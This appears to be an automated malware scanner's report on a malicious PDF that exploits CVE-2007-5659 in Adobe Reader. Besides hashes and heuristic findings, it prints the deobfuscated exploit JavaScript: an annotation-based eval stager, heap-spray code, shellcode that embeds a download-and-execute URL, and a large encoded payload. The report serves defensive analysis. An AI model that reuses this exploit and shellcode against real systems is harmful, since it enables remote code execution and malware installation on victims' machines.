Malicious PDF — malware analysis report

Static analysis result for SHA-256 75f3a56d31357710…

MALICIOUS

PDF

16.7 KB
MD5: b787ae494f0b711f7f7dda55f8b07b7b SHA-1: f49621c116229258290b5da3e33ad3f6fede27a2 SHA-256: 75f3a56d313577108da889d03e2a6b0ccd180d47341227a10a08e58fb02aa507
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed as a dropper, extracting a URL from the annotation subject and using String.fromCharCode to decode and execute a second-stage payload. The embedded URL http://sstdsclick4.com/cgi-bin/defs.php/n00a102801r0409Xbc3f49b1Y11f74857 is highly suspicious and likely serves as the download location for the next stage of the attack.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sstdsclick4.com/cgi-bin/defs.php/n00a102801r0409Xbc3f49b1Y11f74857 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x403F 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
643f65ac96096644b1a8c515187a24d07fd8db37b24080bdce82d45ca126302b		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1A1F 5223 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var IJk_tAemAVK5_G = new Array();var EW_r6rLcUMJbS = 0;var s_SYps_b6_6f = "";function c___RlL(Rx6_2_T2lX_GY3, w__T_0D_hX7_vq){var OIH61_b0v_Ux = w__T_0D_hX7_vq.toString();var P_m___e__7Yg_2 = "";for(var w3_04Q = 0; w3_04Q < OIH61_b0v_Ux.length; w3_04Q++) {var Jb5fqR78_2 = parseInt(OIH61_b0v_Ux.substr(w3_04Q, 1));if (!isNaN(Jb5fqR78_2)) {Jb5fqR78_2 = Jb5fqR78_2.toString(16);if (Jb5fqR78_2.length == 1) { Jb5fqR78_2 = "0" + Jb5fqR78_2; }else if (Jb5fqR78_2.length != 2) { Jb5fqR78_2 = "00"; }P_m___e__7Yg_2 = Jb5fqR78_2 + P_m___e__7Yg_2;if (P_m___e__7Yg_2.length == 8) {break;}}}while(P_m___e__7Yg_2.length < 8) { P_m___e__7Yg_2 = "0" + P_m___e__7Yg_2; }var vYpyi_R__Ke_Mp0 = Rx6_2_T2lX_GY3.toString(16);if (vYpyi_R__Ke_Mp0.length == 1) { vYpyi_R__Ke_Mp0 = "0" + vYpyi_R__Ke_Mp0; }else if (vYpyi_R__Ke_Mp0.length != 2) { vYpyi_R__Ke_Mp0 = "00"; }P_m___e__7Yg_2 = "3" + vYpyi_R__Ke_Mp0 + "P" + P_m___e__7Yg_2;return P_m___e__7Yg_2;}function R__8___8002_G_P(djob6b6w5Joke, O4SGpf423){var J6B_4P_uy = new Array("");var I_4_I86_3u = djob6b6w5Joke;var n6___4nm;if ((n6___4nm = djob6b6w5Joke.lastIndexOf("%u00")) != -1) {if (n6___4nm + 6 == djob6b6w5Joke.length) {J6B_4P_uy[0] = djob6b6w5Joke.substr(n6___4nm + 4, 2);I_4_I86_3u = djob6b6w5Joke.substring(0, n6___4nm);}}n6___4nm = 1;for (w3_04Q = 0; w3_04Q < O4SGpf423.length; w3_04Q++) {var V_U_51TxUSGq = O4SGpf423.charCodeAt(w3_04Q).toString(16);if (V_U_51TxUSGq.length == 1) { V_U_51TxUSGq = "0" + V_U_51TxUSGq; }J6B_4P_uy[n6___4nm] = V_U_51TxUSGq;n6___4nm++;}w3_04Q = J6B_4P_uy[0].length ? 0 : 1;J6B_4P_uy[n6___4nm] = "00";J6B_4P_uy[n6___4nm + 1] = "00";n6___4nm += 2;if ((J6B_4P_uy.length - w3_04Q) % 2) {J6B_4P_uy[n6___4nm] = "00";}while(w3_04Q < J6B_4P_uy.length) {I_4_I86_3u += "%u" + J6B_4P_uy[w3_04Q + 1] + J6B_4P_uy[w3_04Q];w3_04Q += 2;}I_4_I86_3u += "%u0000";return I_4_I86_3u;}function pkJ_j1a(V5eSU66N7y2V8O, h63QE5){while (V5eSU66N7y2V8O.length*2<h63QE5) {V5eSU66N7y2V8O += V5eSU66N7y2V8O;}V5eSU66N7y2V8O = V5eSU66N7y2V8O.substring(0,h63QE5/2);return V5eSU66N7y2V8O;}function o2___D(s80T_N, n0_TH__D8AC3, p6_8W1XK_N1_l){var lD_Iquci1F = 0x0c0c0c0c;var V5eSU66N7y2V8O = unescape(n0_TH__D8AC3);var O4SGpf423 = c___RlL(s80T_N, p6_8W1XK_N1_l);var tl_721FE = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var djob6b6w5Joke = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7270%u5966%u004e%u7468%u7074%u2f3a%u732f%u7473%u7364%u6c63%u6369%u346b%u632e%u6d6f%u632f%u6967%u622d%u6e69%u642f%u6665%u2e73%u6870%u2f70%u306e%u6130%u3031%u3832%u3130%u3072%u3034%u5839%u6362%u6633%u3934%u3162%u3159%u6631%u3437%u3538%u0037";app.h7jW_F = unescape(R__8___8002_G_P(djob6b6w5Joke, O4SGpf423));var JIaW34V8Ce = 0x400000;var HLCEy_7_3 = tl_721FE.length * 2;var h63QE5 = JIaW34V8Ce - (HLCEy_7_3+0x38);V5eSU66N7y2V8O = pkJ_j1a(V5eSU66N7y2V8O, h63QE5);var Hn_V_vd4O2__U = (lD_Iquci1F - 0x400000)/JIaW34V8Ce;for (var F___0u = 0; F___0u < Hn_V_vd4O2__U; F___0u++) {IJk_tAemAVK5_G[F___0u] = V5eSU66N7y2V8O + tl_721FE;}}function V56t__DN0T6_pd(){var d_B__8A_EP__cg = "";for (w3_04Q = 0; w3_04Q < 12; w3_04Q++) {d_B__8A_EP__cg += unescape("%u0c0c%u0c0c"
... (truncated)
legacy_pdfkit_stage_000.js
e66448942428f213ac6b61ee32c9eca9c8aef840c5c5c56061e04084dee34651		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A73 11617 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function V__j__rD_3b_4w(a_r_xbbP, f_K_qf){var Q4_i_cF_Uv_V_23 = new Array();var L_1_DWp = 512;var h___u8v = 21;var qR56oJ_d = 0;var P__CdP_gcc0gkj = 0;var x4Y4oh61_4uT = 0;var bXIeyGI_xPi = "";var v_gi_ep53 = "";var bOXwXHWxn = 6;try {var tYWohyb7Y5LK_7 = 0;if (app) {x4Y4oh61_4uT = x4Y4oh61_4uT + 2;f_K_qf = pr[tYWohyb7Y5LK_7].subject;}} catch(e) { }x4Y4oh61_4uT = x4Y4oh61_4uT + 5;if (!a_r_xbbP) { Q4_i_cF_Uv_V_23 = new Array(148,166,198,49,88,190);} else {Q4_i_cF_Uv_V_23 = a_r_xbbP;}var nUv__733G = 0;var t3g__Yh_ND = 0;var X_u_SQV = 0;while(t3g__Yh_ND < f_K_qf.length) {var p_q874m43 = f_K_qf.substr(t3g__Yh_ND, 2);var H1bK1Eq = parseInt(p_q874m43, 21);if (nUv__733G >= bOXwXHWxn) {nUv__733G = 0;}H1bK1Eq -= Q4_i_cF_Uv_V_23[nUv__733G] * (X_u_SQV + 2);if (H1bK1Eq < 0) {H1bK1Eq -= Math.floor(H1bK1Eq / 256) * (L_1_DWp / 2);}if (t3g__Yh_ND >= 0) {H1bK1Eq = String.fromCharCode(H1bK1Eq);}if (x4Y4oh61_4uT == 6) {bXIeyGI_xPi += N2___i6K3OL73;} else if (x4Y4oh61_4uT == 7) {bXIeyGI_xPi += H1bK1Eq;} else {bXIeyGI_xPi += t3g__Yh_ND;}nUv__733G++;t3g__Yh_ND += 2;X_u_SQV++;}var A370_7_uE02Mf = this;A370_7_uE02Mf['ev'+'al'](bXIeyGI_xPi);}
	V__j__rD_3b_4w(0, "7b3k6c10455j0b2b2648670j450g835d6h4d88a91fa37i051j9615c3895i806h691k94b1136h382eag1bag5hbg409g803b4h444e880278532j90938h2d23a7af1e148abd659g1h3f0595b3ad0b088dbd9i433a671h6c5a4k3gb2648i00433j5dac6j6c8c4g7h6e5547955g14971512006h86560e6a1h801h921c4a4a5g905d07c22987c393934d75a0464i9g1ka57da96a9ca5aiai580g5h5i0jbh908f6i27c31f501e59a44c24a3570b34702740ae110b88308d740f879b1i1e12b61h872j4a3b71a116611f9b9f7a3e317a3c760g2b638i9g2k8c4e4c672h4d44637e7f8k06168k80221k1ka09cak9c981h3321aj3d3g061b1b889c70a36e30baba03651b841h78954ab78hbe0k2f5b618d25404c340c0j3208213ga72d4g2861125j1g27ab0aag3f5b4h513f09ba7a70a80a7f74716h0a3587b97k585e895k9k0j57b31c6h611c94667d400i24a416331g6e608a386jbb5a6hbb9a371ib77fa64h6c8i5k89bjaa05ai4109bg1h7k718e3i308d2a8g725838c2504cbi4g45889j2c91892b1f76353g85564g9h331c09691562a87ac23h3c8h9161076cb92jb1144b692gad75535762751j530g666i2aa04fbjb9a0721b5851ae883g984e3g2693872kbj802h0ib88e255d3fbh6fbj9j2a7f2k098cb76e66182cb37026040ga26k65151b3j2bae6j6cbe3e6k333722184706103bc36g6h8h56347g7j5e1ib81c156f6f4e3b0894bi9k0887956hb46i410g91293dadc19a8fa54g9a5238723f4i09b55f330g88184525499ca41a7i7e3a4j9ic23f1g2a0j2d395d5cb0571c14b321b94i5b4d814fb8108a691509957e655767677630ae72bib841ab0e7c312c556f2h8fbfb106080j751a13366i509ia59i0d5a7had2j1ab41a9795597a73608j95ak035h3h0g1876877a092c1aaj1c6b7k250b33905j3e72000c0h46098a3g486h2361a24b9e13agbha02635759fa9b6618i9dak5f315e29346e2e5d7095bj83a4715fbc2c3g388k99427d6209b2b20j3g318bc29e659a1a4kbe91c2361f034b081h72a54c33a7773c7b466i264j8994a88k25851g7i5gbc0gbf5c3bbba70i51a924b31j572d6j3i5140565k052b096d3haf2e2d98857g61880751694k044dbb1cbf8740ad98741392964k5h1936a344a57fc01a7e7808354d360bbba43g3d97097i202fad8k10147a24408fc13fb3a0bhad0b9590a49e3h305c129i564k1iah7485ak3g2j199d4h5h5c2h6k735653bd6b36b345c3b5728h493f5bb052b7820i0a0d5i4e3h05bi599210abb26h579c6j3g7d0f9kaj0iab97ak7iae583e725i0a05aj8f3i142e0f220b5i9d53249k8k3c5e6db92a1a1gai7f308d57a862783g0h0fac17bc51856c80bjb469b0b3987k313d374j5529397d00973h8f3h8j66505b39746897ad1517a0a35613076i07a3af6ib86827af430g8ca80e9e9b94b15j40c3bj2d7g2e4j0f54984aaf5e1f132d6660ad06765c3h470e369k243c02b24a316h23701e55b4ah162k2b2e156g9fa977617706b0317b3h2k5h9g1h907f66c35e8a178j1i246k5437a261ak551058920g130g5g71883f6cbk1c4h899i00ah9g71936394004c8h198825ab34b424474k6f800jb97cc14i6i543g2e556e067d1g711a5ga75k531e73456eab2f3j161bbbab61a84k14a32g6d3bb69132077hbh5eaiac56685g8d888j7b987h52923j9fai4875799dacad9017627i988jbb711dc0c19c631c2f8c3hbibb6818436eae52b106288428a67f8kah7520671e9i2kc04hb57g951h13554h9j4e66be6080615c47256g3k942b187b7b6i562j7g5i862h80c3087b6d805613848ja5b2a58i4g0a6i4j0g7b0fc3bg9k9a648442883f00673h60b0bf913fbb66ac4i2b539eb41j814k452hc000110hbaa5b5009k860b9509371k05b61k31408e5k98ad7j26b8937i57864j7360550i8c4ac1bh61bfb38759543479be9a8dad1100356b1f532f966faga1ac102i578e071ebk19678g80929e8j939k153h873kbh1c4k8k7g0i2k2a11b14b6718013c4c630c5g30b4121a947a4k4b65107i6h2j7b9dagbj8d2h0i5dbe9k154174b5bb5c2a5e3c3c60323i5d6ib05d8g6e982
... (truncated)
deobfuscated.js
88020389339994473aab0eab2e43dcf3b1ba7361800ad0560b02b6e86f5486fd		 deobfuscated-js PDF JavaScript deobfuscation pass 88632 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
7b3k6c10455j0b2b2648670j450g835d6h4d88a91fa37i051j9615c3895i806h691k94b1136h382eag1bag5hbg409g803b4h444e880278532j90938h2d23a7af1e148abd659g1h3f0595b3ad0b088dbd9i433a671h6c5a4k3gb2648i00433j5dac6j6c8c4g7h6e5547955g14971512006h86560e6a1h801h921c4a4a5g905d07c22987c393934d75a0464i9g1ka57da96a9ca5aiai580g5h5i0jbh908f6i27c31f501e59a44c24a3570b34702740ae110b88308d740f879b1i1e12b61h872j4a3b71a116611f9b9f7a3e317a3c760g2b638i9g2k8c4e4c672h4d44637e7f8k06168k80221k1ka09cak9c981h3321aj3d3g061b1b889c70a36e30baba03651b841h78954ab78hbe0k2f5b618d25404c340c0j3208213ga72d4g2861125j1g27ab0aag3f5b4h513f09ba7a70a80a7f74716h0a3587b97k585e895k9k0j57b31c6h611c94667d400i24a416331g6e608a386jbb5a6hbb9a371ib77fa64h6c8i5k89bjaa05ai4109bg1h7k718e3i308d2a8g725838c2504cbi4g45889j2c91892b1f76353g85564g9h331c09691562a87ac23h3c8h9161076cb92jb1144b692gad75535762751j530g666i2aa04fbjb9a0721b5851ae883g984e3g2693872kbj802h0ib88e255d3fbh6fbj9j2a7f2k098cb76e66182cb37026040ga26k65151b3j2bae6j6cbe3e6k333722184706103bc36g6h8h56347g7j5e1ib81c156f6f4e3b0894bi9k0887956hb46i410g91293dadc19a8fa54g9a5238723f4i09b55f330g88184525499ca41a7i7e3a4j9ic23f1g2a0j2d395d5cb0571c14b321b94i5b4d814fb8108a691509957e655767677630ae72bib841ab0e7c312c556f2h8fbfb106080j751a13366i509ia59i0d5a7had2j1ab41a9795597a73608j95ak035h3h0g1876877a092c1aaj1c6b7k250b33905j3e72000c0h46098a3g486h2361a24b9e13agbha02635759fa9b6618i9dak5f315e29346e2e5d7095bj83a4715fbc2c3g388k99427d6209b2b20j3g318bc29e659a1a4kbe91c2361f034b081h72a54c33a7773c7b466i264j8994a88k25851g7i5gbc0gbf5c3bbba70i51a924b31j572d6j3i5140565k052b096d3haf2e2d98857g61880751694k044dbb1cbf8740ad98741392964k5h1936a344a57fc01a7e7808354d360bbba43g3d97097i202fad8k10147a24408fc13fb3a0bhad0b9590a49e3h305c129i564k1iah7485ak3g2j199d4h5h5c2h6k735653bd6b36b345c3b5728h493f5bb052b7820i0a0d5i4e3h05bi599210abb26h579c6j3g7d0f9kaj0iab97ak7iae583e725i0a05aj8f3i142e0f220b5i9d53249k8k3c5e6db92a1a1gai7f308d57a862783g0h0fac17bc51856c80bjb469b0b3987k313d374j5529397d00973h8f3h8j66505b39746897ad1517a0a35613076i07a3af6ib86827af430g8ca80e9e9b94b15j40c3bj2d7g2e4j0f54984aaf5e1f132d6660ad06765c3h470e369k243c02b24a316h23701e55b4ah162k2b2e156g9fa977617706b0317b3h2k5h9g1h907f66c35e8a178j1i246k5437a261ak551058920g130g5g71883f6cbk1c4h899i00ah9g71936394004c8h198825ab34b424474k6f800jb97cc14i6i543g2e556e067d1g711a5ga75k531e73456eab2f3j161bbbab61a84k14a32g6d3bb69132077hbh5eaiac56685g8d888j7b987h52923j9fai4875799dacad9017627i988jbb711dc0c19c631c2f8c3hbibb6818436eae52b106288428a67f8kah7520671e9i2kc04hb57g951h13554h9j4e66be6080615c47256g3k942b187b7b6i562j7g5i862h80c3087b6d805613848ja5b2a58i4g0a6i4j0g7b0fc3bg9k9a648442883f00673h60b0bf913fbb66ac4i2b539eb41j814k452hc000110hbaa5b5009k860b9509371k05b61k31408e5k98ad7j26b8937i57864j7360550i8c4ac1bh61bfb38759543479be9a8dad1100356b1f532f966faga1ac102i578e071ebk19678g80929e8j939k153h873kbh1c4k8k7g0i2k2a11b14b6718013c4c630c5g30b4121a947a4k4b65107i6h2j7b9dagbj8d2h0i5dbe9k154174b5bb5c2a5e3c3c60323i5d6ib05d8g6e982h4771338a9272845f18a46ib00g358bbdad3k761h5715aha73iba0a1cc34h8f9h8660a97i0bbk47511a195j8b8077b984bf6a6d8f262b857g21a73e5f175aag2c5b1h39272e1g26539307bg4h42b15eb7887d7i70b40c2g997cb62ib910b357307d6a5jah64893362282e7h2g9i7g0d46b77138587445c230621cc05jc14i10bj7f7eaeaa6d2246bf1a6fc00g2babbkad4c8g7k3d372cae6k463028b24g7b0j7h5g220k74998k66a8313417bb3k369b24ba9d3h61260g54b08j139104381c7d7e5c1ab0637310a5b24g7kab690g83bd63889h6c6fbec0bh5i3d78351da1aj6a3f0hbab515152a7j42bd917k43633c2i3824231b83095d8bbc877a3g0jb1973k955c4a3k878ga52b1i955d4jbk514846760k3i6h0f095gbk467c2k2i3k395f578bab06bg7082222g1k7hb29iadb2096dbbad0e17ah101b0767927j6i4893ba105h285323658759037dbhai1i41907abk4b4c1j0h130g99b1158a044e567h347j491b9a07ak2d4a391j619cba5d7a9f0db165a3763a60602abb6c85bb5a9ca37jbg4h5g4d0973668765ag3g80bi170e8k418b5685071c9307bj3a1d016d9b486fc370akak88198d49b2111h746ibd332k9c2a86422b172k55491c551g5a9j6b9d664h0h5k1j3f963883a022bdb3319k41a88ebf7254aja22g2b5e072ga6ae486d61a47889688d8424751ia07f31805k8c8k7d8c185e6dbj9908862341c1bf601i08bc4i0i2397266f671i42bh9h265a03bc678j7872093i209i66c24ebh3h7hb20k3k3kac4k7j0c6b7h5d3f3c2c7a3d0d4k0372769c60c28b5g7c23b0060gae6a594005
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.